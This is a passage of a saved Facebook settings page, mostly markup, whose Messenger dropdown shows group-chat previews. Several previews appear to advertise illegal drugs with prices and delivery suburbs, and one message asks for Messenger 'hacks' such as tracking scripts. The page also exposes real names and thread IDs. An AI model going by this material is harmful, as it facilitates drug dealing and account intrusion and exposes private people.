class="uiScrollableAreaContent"> <ul class="jewelContent"> <li class="jewelItemNew"> <a class="messagesContent" href="https://www.facebook.com/messages/t/1709647409066354" role="button"> <div class="clearfix" direction="left"> <div class="_ohe lfloat"> <div class="_p32 img _8o"> <div> <div class="_4ldz" style="height: 48px; width: 48px;"> <div class="_4ld-" style="height: 48px; width: 48px;"> <div style='height: 48px; background-image: url("https://scontent.fisu6-1.fna.fbcdn.net/v/t1.15752-9/32722985_201617513783382_1263060451944562688_n.jpg?_nc_cat=0&amp;oh=9b4934d2e6e4ab9e4dea694e043fdc7f&amp;oe=5BC4D399"); background-position: 50% 50%; background-repeat: no-repeat; background-size: cover; width: 48px;'> </div> </div> </div> </div> </div> </div> <div class=""> <div class="_42ef clearfix" direction="right"> <div class="_ohf rfloat"> <div> <span class="_56hv"> <i style='background-image: url("https://scontent.fisu6-1.fna.fbcdn.net/v/t1.15752-0/s50x50/35415376_1925015127557357_4095300073204744192_n.jpg?_nc_cat=0&amp;oh=9ddd46eb2aded833c1a584ef7ae10a3a&amp;oe=5BA4A9AF");'> </i> </span> <div class="x_div"> <div aria-label="Mark as read" class="_5c9q" data-hover="tooltip" data-tooltip-alignh="center" data-tooltip-content="Mark as read" role="button" tabindex="0"> </div> </div> </div> </div> <div class=""> <div class="content"> <div class="author fixemoji"> <span> <span> Tequila Sunrise, Blood Shot Eyes </span> (989) </span> <span class="presenceIndicator groupThread"> <span class="accessible_elem"> </span> </span> </div> <div class="_1iji"> <div class="_1ijj"> <span class="_3jy5"> </span> <span> <span class="_j0r"> </span> <span> Renata Mclean sent a photo. </span> </span> </div> <div> </div> </div> <div class="time"> <abbr class="timestamp" data-utime="1529236037.772" title="Today"> 07:47 </abbr> </div> </div> </div> </div> </div> </div> </a> </li> <li class="jewelItemNew"> <a class="messagesContent" href="https://www.facebook.com/messages/t/1522104121208432" role="button"> <div class="clearfix" direction="left"> <div class="_ohe lfloat"> <div class="_p32 img _8o"> <div> <div class="_4ldz" style="height: 48px; width: 48px;"> <div class="_4ld-" style="height: 48px; width: 48px;"> <div style='height: 48px; background-image: url("https://scontent.fisu6-1.fna.fbcdn.net/v/t1.15752-9/34633254_207468699864930_8439580276731936768_n.jpg?_nc_cat=0&amp;oh=932f2777d84f3df508f26335d21e8640&amp;oe=5BAFC951"); background-position: 50% 50%; background-repeat: no-repeat; background-size: cover; width: 48px;'> </div> </div> </div> </div> </div> </div> <div class=""> <div class="_42ef clearfix" direction="right"> <div class="_ohf rfloat"> <div> <span> </span> <div class="x_div"> <div aria-label="Mark as read" class="_5c9q" data-hover="tooltip" data-tooltip-alignh="center" data-tooltip-content="Mark as read" role="button" tabindex="0"> </div> </div> </div> </div> <div class=""> <div class="content"> <div class="author fixemoji"> <span> <span> Puddle Ducks Galore </span> (31) </span> <span class="presenceIndicator groupThread"> <span class="accessible_elem"> </span> </span> </div> <div class="_1iji"> <div class="_1ijj"> <span class="_3jy5"> </span> <span> <span> Imran Khan left the group. </span> </span> </div> <div> </div> </div> <div class="time"> <abbr class="timestamp" data-utime="1529234589.67" title="Today"> 07:23 </abbr> </div> </div> </div> </div> </div> </div> </a> </li> <li class="jewelItemNew"> <a class="messagesContent" href="https://www.facebook.com/messages/t/1722250114516050" role="button"> <div class="clearfix" direction="left"> <div class="_ohe lfloat"> <div class="_p32 img _8o"> <div> <div class="_4ldz" style="height: 48px; width: 48px;"> <div class="_4ld-" style="height: 48px; width: 48px;"> <div style='height: 48px; background-image: url("https://scontent.fisu6-1.fna.fbcdn.net/v/t1.15752-9/35144021_209452706333196_3436413985048494080_n.jpg?_nc_cat=0&amp;oh=86db981aad02309df6e8ad07895a41a4&amp;oe=5BAFD505"); background-position: 50% 50%; background-repeat: no-repeat; background-size: cover; width: 48px;'> </div> </div> </div> </div> </div> </div> <div class=""> <div class="_42ef clearfix" direction="right"> <div class="_ohf rfloat"> <div> <span> </span> <div class="x_div"> <div aria-label="Mark as read" class="_5c9q" data-hover="tooltip" data-tooltip-alignh="center" data-tooltip-content="Mark as read" role="button" tabindex="0"> </div> </div> </div> </div> <div class=""> <div class="content"> <div class="author fixemoji"> <span> <span> Meltdown Crackstation </span> (252) </span> <span class="presenceIndicator groupThread"> <span class="accessible_elem"> </span> </span> </div> <div class="_1iji"> <div class="_1ijj"> <span class="_3jy5"> </span> <span> <span> Danial Brant left the group. </span> </span> </div> <div> </div> </div> <div class="time"> <abbr class="timestamp" data-utime="1529233888.297" title="Today"> 07:11 </abbr> </div> </div> </div> </div> </div> </div> </a> </li> <li class="jewelItemNew"> <a class="messagesContent" href="https://www.facebook.com/messages/t/1796796520330890" role="button"> <div class="clearfix" direction="left"> <div class="_ohe lfloat"> <div class="_p32 img _8o"> <div> <div class="_4ldz" style="height: 48px; width: 48px;"> <div class="_4ld-" style="height: 48px; width: 48px;"> <div style='height: 48px; background-image: url("https://scontent.fisu6-1.fna.fbcdn.net/v/t1.15752-9/31224529_191820231620775_7807077640099069952_n.jpg?_nc_cat=0&amp;oh=356d6dd9e86e7783b3411fc64a416b00&amp;oe=5BAB3BC1"); background-position: 50% 50%; background-repeat: no-repeat; background-size: cover; width: 48px;'> </div> </div> </div> </div> </div> </div> <div class=""> <div class="_42ef clearfix" direction="right"> <div class="_ohf rfloat"> <div> <span> </span> <div class="x_div"> <div aria-label="Mark as read" class="_5c9q" data-hover="tooltip" data-tooltip-alignh="center" data-tooltip-content="Mark as read" role="button" tabindex="0"> </div> </div> </div> </div> <div class=""> <div class="content"> <div class="author fixemoji"> <span> <span> <img alt="📰" class="_1ift _2560 img" src="./lll_files/1f4f0.png"/> Extra Extra Bitch All About It <img alt="📰" class="_1ift _2560 img" src="./lll_files/1f4f0.png"/> </span> (1331) </span> <span class="presenceIndicator groupThread"> <span class="accessible_elem"> </span> </span> </div> <div class="_1iji"> <div class="_1ijj"> <span class="_3jy5"> </span> <span> Amelia: <span> 50 green needed currambine 🤑 </span> </span> </div> <div> </div> </div> <div class="time"> <abbr class="timestamp" data-utime="1529233866.293" title="Today"> 07:11 </abbr> </div> </div> </div> </div> </div> </div> </a> </li> <li class="jewelItemNew"> <a class="messagesContent" href="https://www.facebook.com/messages/t/1438769166235779" role="button"> <div class="clearfix" direction="left"> <div class="_ohe lfloat"> <div class="_p32 img _8o"> <div> <div class="_4ldz" style="height: 48px; width: 48px;"> <div class="_4ld-" style="height: 48px; width: 48px;"> <div style='height: 48px; background-image: url("https://scontent.fisu6-1.fna.fbcdn.net/v/t1.15752-9/34604318_207831199828680_4571236591959277568_n.jpg?_nc_cat=0&amp;oh=53002919bb471f6ba51c13307ee74b5e&amp;oe=5BBD392A"); background-position: 50% 50%; background-repeat: no-repeat; background-size: cover; width: 48px;'> </div> </div> </div> </div> </div> </div> <div class=""> <div class="_42ef clearfix" direction="right"> <div class="_ohf rfloat"> <div> <span> </span> <div class="x_div"> <div aria-label="Mark as read" class="_5c9q" data-hover="tooltip" data-tooltip-alignh="center" data-tooltip-content="Mark as read" role="button" tabindex="0"> </div> </div> </div> </div> <div class=""> <div class="content"> <div class="author fixemoji"> <span> <span> Southside Swap-Meet Delivery </span> (877) </span> <span class="presenceIndicator groupThread"> <span class="accessible_elem"> </span> </span> </div> <div class="_1iji"> <div class="_1ijj"> <span class="_3jy5"> </span> <span> Soloman: <span> Drop offs * koota * Everyyone loves it 50pp 200hw 400g 550hb INNALOO Will drop off for extra Vouchers packed if needed for proof of quality Or doing swaps for smart phones and tvs </span> </span> </div> <div> </div> </div> <div class="time"> <abbr class="timestamp" data-utime="1529232049.118" title="Today"> 06:40 </abbr> </div> </div> </div> </div> </div> </div> </a> </li> <li class="jewelItemNew"> <a class="messagesContent" href="https://www.facebook.com/messages/t/1427539400698080" role="button"> <div class="clearfix" direction="left"> <div class="_ohe lfloat"> <div class="_p32 img _8o"> <div> <div class="_4ldz" style="height: 48px; width: 48px;"> <div class="_4ld-" style="height: 48px; width: 48px;"> <div style='height: 48px; background-image: url("https://scontent.fisu6-1.fna.fbcdn.net/v/t1.15752-9/34600372_207668129844987_870503314423283712_n.jpg?_nc_cat=0&amp;oh=cc7c30a270aa0387a5493e89421e8f92&amp;oe=5BA01368"); background-position: 50% 50%; background-repeat: no-repeat; background-size: cover; width: 48px;'> </div> </div> </div> </div> </div> </div> <div class=""> <div class="_42ef clearfix" direction="right"> <div class="_ohf rfloat"> <div> <span> </span> <div class="x_div"> <div aria-label="Mark as read" class="_5c9q" data-hover="tooltip" data-tooltip-alignh="center" data-tooltip-content="Mark as read" role="button" tabindex="0"> </div> </div> </div> </div> <div class=""> <div class="content"> <div class="author fixemoji"> <span> <span> Northside Candy Poppers </span> (893) </span> <span class="presenceIndicator groupThread"> <span class="accessible_elem"> </span> </span> </div> <div class="_1iji"> <div class="_1ijj"> <span class="_3jy5"> </span> <span> <span> Imran Khan left the group. </span> </span> </div> <div> </div> </div> <div class="time"> <abbr class="timestamp" data-utime="1529231974.806" title="Today"> 06:39 </abbr> </div> </div> </div> </div> </div> </div> </a> </li> <li class="jewelItemNew"> <a class="messagesContent" href="https://www.facebook.com/messages/t/1330527007047172" role="button"> <div class="clearfix" direction="left"> <div class="_ohe lfloat"> <div class="_p32 img _8o"> <div> <div class="_4ldz" style="height: 48px; width: 48px;"> <div class="_4ld-" style="height: 48px; width: 48px;"> <div style='height: 48px; background-image: url("https://scontent.fisu6-1.fna.fbcdn.net/v/t1.15752-9/34012104_201137830702894_724685687210639360_n.jpg?_nc_cat=0&amp;oh=d3ae29a30a25d58876f11742e474ba34&amp;oe=5BC1D257"); background-position: 50% 50%; background-repeat: no-repeat; background-size: cover; width: 48px;'> </div> </div> </div> </div> </div> </div> <div class=""> <div class="_42ef clearfix" direction="right"> <div class="_ohf rfloat"> <div> <span> </span> <div class="x_div"> <div aria-label="Mark as read" class="_5c9q" data-hover="tooltip" data-tooltip-alignh="center" data-tooltip-content="Mark as read" role="button" tabindex="0"> </div> </div> </div> </div> <div class=""> <div class="content"> <div class="author fixemoji"> <span> <span> Dont Start Nuttin Wont Be Nothing </span> (1102) </span> <span class="presenceIndicator groupThread"> <span class="accessible_elem"> </span> </span> </div> <div class="_1iji"> <div class="_1ijj"> <span class="_3jy5"> </span> <span> Josh: <span> Anyone deliver 50 osbourne park? </span> </span> </div> <div> </div> </div> <div class="time"> <abbr class="timestamp" data-utime="1529231594.759" title="Today"> 06:33 </abbr> </div> </div> </div> </div> </div> </div> </a> </li> <li class="jewelItemNew"> <a class="messagesContent" href="https://www.facebook.com/messages/t/1879741628767711" role="button"> <div class="clearfix" direction="left"> <div class="_ohe lfloat"> <div class="_p32 img _8o"> <div> <div class="_4ldz" style="height: 48px; width: 48px;"> <div class="_4ld-" style="height: 48px; width: 48px;"> <div style='height: 48px; background-image: url("https://scontent.fisu6-1.fna.fbcdn.net/v/t1.15752-9/34561809_207834066495060_1164925959674003456_n.jpg?_nc_cat=0&amp;oh=98e39cc8b64794b364ce681a1f51d2f0&amp;oe=5BB8AB4B"); background-position: 50% 50%; background-repeat: no-repeat; background-size: cover; width: 48px;'> </div> </div> </div> </div> </div> </div> <div class=""> <div class="_42ef clearfix" direction="right"> <div class="_ohf rfloat"> <div> <span> </span> <div class="x_div"> <div aria-label="Mark as read" class="_5c9q" data-hover="tooltip" data-tooltip-alignh="center" data-tooltip-content="Mark as read" role="button" tabindex="0"> </div> </div> </div> </div> <div class=""> <div class="content"> <div class="author fixemoji"> <span> <span> <img alt="🚨" class="_1ift _2560 img" src="./lll_files/1f6a8.png"/> Red Light District <img alt="🚨" class="_1ift _2560 img" src="./lll_files/1f6a8.png"/> </span> (350) </span> <span class="presenceIndicator groupThread"> <span class="accessible_elem"> </span> </span> </div> <div class="_1iji"> <div class="_1ijj"> <span class="_3jy5"> </span> <span> Jay: <span> amazing big rocks available <img alt="🙂" class="_1ift _2560 img" src="./lll_files/1f642.png"/> 50 p 250 hw 400 g vouches can deliver in canningvale atm <img alt="🙂" class="_1ift _2560 img" src="./lll_files/1f642.png"/> </span> </span> </div> <div> </div> </div> <div class="time"> <abbr class="timestamp" data-utime="1529216606.774" title="Today"> 02:23 </abbr> </div> </div> </div> </div> </div> </div> </a> </li> <li class="jewelItemNew"> <a class="messagesContent" href="https://www.facebook.com/messages/t/100018054047239" role="button"> <div class="clearfix" direction="left"> <div class="_ohe lfloat"> <div class="_p32 img _8o"> <div> <div class="_4ldz" style="height: 48px; width: 48px;"> <div class="_4ld-" style="height: 48px; width: 48px;"> <div class="_55lt" style="width: 48px; height: 48px;"> <img alt="" class="img" height="48" src="./lll_files/33898820_204735583471575_6529164942136836096_n.jpg" width="48"/> </div> </div> </div> </div> </div> </div> <div class=""> <div class="_42ef clearfix" direction="right"> <div class="_ohf rfloat"> <div> <span> </span> <div class="x_div"> <div aria-label="Mark as read" class="_5c9q" data-hover="tooltip" data-tooltip-alignh="center" data-tooltip-content="Mark as read" role="button" tabindex="0"> </div> </div> </div> </div> <div class=""> <div class="content"> <div class="author fixemoji"> <span> Percy (1) </span> <span class="presenceIndicator"> <span class="accessible_elem"> </span> </span> </div> <div class="_1iji"> <div class="_1ijj"> <span class="_3jy5"> </span> <span> <span> Thanx i ask z 4 this exact reason. Ppl are cunts </span> </span> </div> <div> </div> </div> <div class="time"> <abbr class="timestamp" data-utime="1527659279.598" title="30 May"> 30 May </abbr> </div> </div> </div> </div> </div> </div> </a> </li> <li class="jewelItemNew"> <a class="messagesContent" href="https://www.facebook.com/messages/t/100023783975520" role="button"> <div class="clearfix" direction="left"> <div class="_ohe lfloat"> <div class="_p32 img _8o"> <div> <div class="_4ldz" style="height: 48px; width: 48px;"> <div class="_4ld-" style="height: 48px; width: 48px;"> <div class="_55lt" style="width: 48px; height: 48px;"> <img alt="" class="img" height="48" src="./lll_files/27332326_144577333011732_4169265510820868676_n.jpg" width="48"/> </div> </div> </div> </div> </div> </div> <div class=""> <div class="_42ef clearfix" direction="right"> <div class="_ohf rfloat"> <div> <span> </span> <div class="x_div"> <div aria-label="Mark as read" class="_5c9q" data-hover="tooltip" data-tooltip-alignh="center" data-tooltip-content="Mark as read" role="button" tabindex="0"> </div> </div> </div> </div> <div class=""> <div class="content"> <div class="author fixemoji"> <span> Toke King (1) </span> <span class="presenceIndicator"> <span class="accessible_elem"> </span> </span> </div> <div class="_1iji"> <div class="_1ijj"> <span class="_3jy5"> </span> <span> <span> I need some good hacks like trackurl please for fb messenger or a script thats super please im sinking on my own out here </span> </span> </div> <div> </div> </div> <div class="time"> <abbr class="timestamp" data-utime="1527647977.146" title="29 May"> 29 May </abbr> </div> </div> </div> </div> </div> </div> </a> </li> </ul> <div class="_v8y"> <a href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#"> Show Older </a> </div> </div> </div> </div> <div class="uiScrollableAreaTrack hidden_elem"> <div class="uiScrollableAreaGripper hidden_elem"> </div> </div> </div> </div> <div class="_3y6_" id="MercuryJewelFooter"> <span> </span> <a class="_4djt" href="https://www.facebook.com/messages/t/"> See all in Messenger </a> <a class="_1c1m" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" role="button"> Mark All as Read </a> </div> </div> </div> </div> <div class="_4kny"> <div class="uiToggle _4962 _4xi2 _5orm" data-toggle-wc="1" id="fbNotificationsJewel"> <a aria-labelledby="u_0_9" class="jewelButton _3eo9" data-gt='{"ua_id":"jewel:notifications"}' data-hover="tooltip" data-target="fbNotificationsFlyout" data-tooltip-content="Notifications" data-tooltip-delay="500" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" name="notifications" rel="toggle" role="button"> <div class="_2n_9"> <span class="jewelCount" id="u_0_9"> <span class="_51lp hidden_elem _3z_5 _5ugh" id="notificationsCountValue"> 0 </span> <i class="accessible_elem"> Notifications </i> </span> </div> </a> <div aria-labelledby="fbNotificationsJewelHeader" class="__tw toggleTargetClosed _4xi1 uiToggleFlyout" id="fbNotificationsFlyout" role="dialog"> <div class="beeperNub"> </div> <div class="uiHeader uiHeaderBottomBorder jewelHeader"> <div class="clearfix uiHeaderTop"> <div class="rfloat _ohf"> <h3 class="accessible_elem" id="fbNotificationsJewelHeader"> Notifications </h3> <div class="uiHeaderActions fsm fwn fcg"> <a data-testid="non_react_mark_all_as_read_link" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" id="u_0_j" role="button"> Mark all as read </a> <span aria-hidden="true" role="presentation"> · </span> <a href="https://www.facebook.com/settings?tab=notifications&amp;section=on_facebook"> Settings </a> </div> </div> <div> <h3 aria-hidden="true" class="uiHeaderTitle"> Notifications </h3> </div> </div> </div> <div class="_33p"> <div id="u_0_k"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo jewelLoading" role="progressbar"> </span> </div> </div> <div class="jewelFooter"> <a accesskey="5" class="seeMore" href="https://www.facebook.com/notifications"> <span> See All </span> </a> </div> </div> </div> </div> </div> <div class="_cy6 _2s24"> <div class="_4kny"> <div class="uiToggle _8-a _1kj2 _4d1i _-57 _5-sk" id="u_0_l"> <a aria-controls="u_0_8" aria-haspopup="true" aria-label="Help Centre" class="_59fc" data-hover="tooltip" data-onclick='[["HelpLiteFlyoutBootloader","loadFlyout"]]' data-tooltip-content="Quick Help" data-tooltip-delay="500" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#" rel="toggle" role="button"> <div class="_59fb _tmz"> </div> </a> <div class="__tw _8-b _tdb toggleTargetClosed uiToggleFlyout" id="u_0_8"> <div class="beeperNub"> </div> <div id="fbHelpLiteFlyout"> <div class="_5uco" id="fbHelpLiteFlyoutLoading"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _26y2" role="progressbar"> </span> </div> </div> <div id="fbHelpLitePrivacyHolder"> </div> </div> </div> </div> <div class="_4kny"> <div class="_5lxr"> <div class="_6a _6b uiPopover _1io_ _5v-0" data-nocookies="1" id="logoutMenu"> <a aria-expanded="false" aria-haspopup="true" aria-labelledby="userNavigationLabel" class="_5lxs _3qct _p" data-gt='{"ref":"async_menu","logout_menu_click":"async_menu"}' href="https://www.facebook.com/settings?ref=mb&amp;drop" id="pageLoginAnchor" rel="toggle" role="button"> <div class="_5lxt" id="userNavigationLabel"> Account Settings </div> </a> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="_1r9-" id="u_0_m"> </div> </div> </div> <div class="uiContextualLayerParent" id="globalContainer"> <div class="fb_content clearfix " id="content" role=""> <div> <div class="hidden_elem" id="toolbarContainer"> </div> <div id="mainContainer"> <div id="leftCol"> <div aria-label="Apps" class="fbSettingsNavigation uiFutureSideNav" id="sideNav" role="navigation"> <ul class="uiSideNav" id="u_0_3"> <li class="sideNavItem stat_elem" id="navItem_account"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://www.facebook.com/settings?tab=account" title="General"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_L0p78lJb2qp sx_9bc14e"> </i> </span> <div class="linkWrap noCount"> General <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> <li aria-current="page" class="sideNavItem stat_elem open selectedItem" id="navItem_security"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://www.facebook.com/settings?tab=security" title="Security and login"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_L0p78lJb2qp sx_57aff6"> </i> </span> <div class="linkWrap noCount"> Security and login <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> <li class="sideNavItem stat_elem" id="navItem_your_facebook_information"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://www.facebook.com/settings?tab=your_facebook_information" title="Your Facebook information"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_L0p78lJb2qp sx_c8ea74"> </i> </span> <div class="linkWrap noCount"> Your Facebook information <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> <li class="divider" id="u_0_4"> </li> <li class="sideNavItem stat_elem" id="navItem_privacy"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://www.facebook.com/settings?tab=privacy" title="Privacy"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_L0p78lJb2qp sx_0b691e"> </i> </span> <div class="linkWrap noCount"> Privacy <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> <li class="sideNavItem stat_elem" id="navItem_timeline"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://www.facebook.com/settings?tab=timeline" title="Timeline and tagging"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_L0p78lJb2qp sx_9590d5"> </i> </span> <div class="linkWrap noCount"> Timeline and tagging <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> <li class="sideNavItem stat_elem" id="navItem_location"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://www.facebook.com/settings?tab=location" title="Location"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_L0p78lJb2qp sx_dade33"> </i> </span> <div class="linkWrap noCount"> Location <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> <li class="sideNavItem stat_elem" id="navItem_blocking"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://www.facebook.com/settings?tab=blocking" title="Blocking"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_L0p78lJb2qp sx_a16fee"> </i> </span> <div class="linkWrap noCount"> Blocking <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> <li class="sideNavItem stat_elem" id="navItem_language"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://www.facebook.com/settings?tab=language" title="Language"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_L0p78lJb2qp sx_e4a31a"> </i> </span> <div class="linkWrap noCount"> Language <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> <li class="divider" id="u_0_5"> </li> <li class="sideNavItem stat_elem" id="navItem_notifications"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://www.facebook.com/settings?tab=notifications" title="Notifications"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_L0p78lJb2qp sx_7ddcf0"> </i> </span> <div class="linkWrap noCount"> Notifications <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> <li class="sideNavItem stat_elem" id="navItem_mobile"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://www.facebook.com/settings?tab=mobile" title="Mobile"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_L0p78lJb2qp sx_e7cab5"> </i> </span> <div class="linkWrap noCount"> Mobile <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> <li class="sideNavItem stat_elem" id="navItem_followers"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://www.facebook.com/settings?tab=followers" title="Public posts"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_L0p78lJb2qp sx_5cb552"> </i> </span> <div class="linkWrap noCount"> Public posts <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> <li class="divider" id="u_0_6"> </li> <li class="sideNavItem stat_elem" id="navItem_applications"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://www.facebook.com/settings?tab=applications&amp;ref=settings" title="Apps and websites"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_L0p78lJb2qp sx_398590"> </i> </span> <div class="linkWrap noCount"> Apps and websites <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> <li class="sideNavItem stat_elem" id="navItem_business_tools"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://www.facebook.com/settings?tab=business_tools" title="Business integrations"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_L0p78lJb2qp sx_3b37e0"> </i> </span> <div class="linkWrap noCount"> Business integrations <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> <li class="sideNavItem stat_elem" id="navItem_ads"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://www.facebook.com/settings?tab=ads" title="Ads"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_L0p78lJb2qp sx_4b0590"> </i> </span> <div class="linkWrap noCount"> Ads <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> <li class="sideNavItem stat_elem" id="navItem_payments"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://secure.facebook.com/settings?tab=payments&amp;ref=settings_nav" title="Payments"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_L0p78lJb2qp sx_3eeef5"> </i> </span> <div class="linkWrap noCount"> Payments <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> <li class="sideNavItem stat_elem" id="navItem_support"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://www.facebook.com/support/?ref=settings" title="Support Inbox"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_L0p78lJb2qp sx_25dde7"> </i> </span> <div class="linkWrap noCount"> Support Inbox <span class="count _5wk0 hidden_elem uiSideNavCountText"> ( <span class="countValue fsm"> 0 </span> <span class="maxCountIndicator"> </span> ) </span> </div> </div> </a> </li> <li class="sideNavItem stat_elem" id="navItem_videos"> <div class="buttonWrap"> </div> <a class="item clearfix" href="https://www.facebook.com/settings?tab=videos" title="Videos"> <div class="rfloat"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yn _55yo _5tqs uiSideNavSpinner" role="progressbar"> </span> </div> <div> <span class="imgWrap"> <i class="img sp_Q_SFgtofUXE sx_b40923"> </i> </span> <div class="linkWrap noCount"> 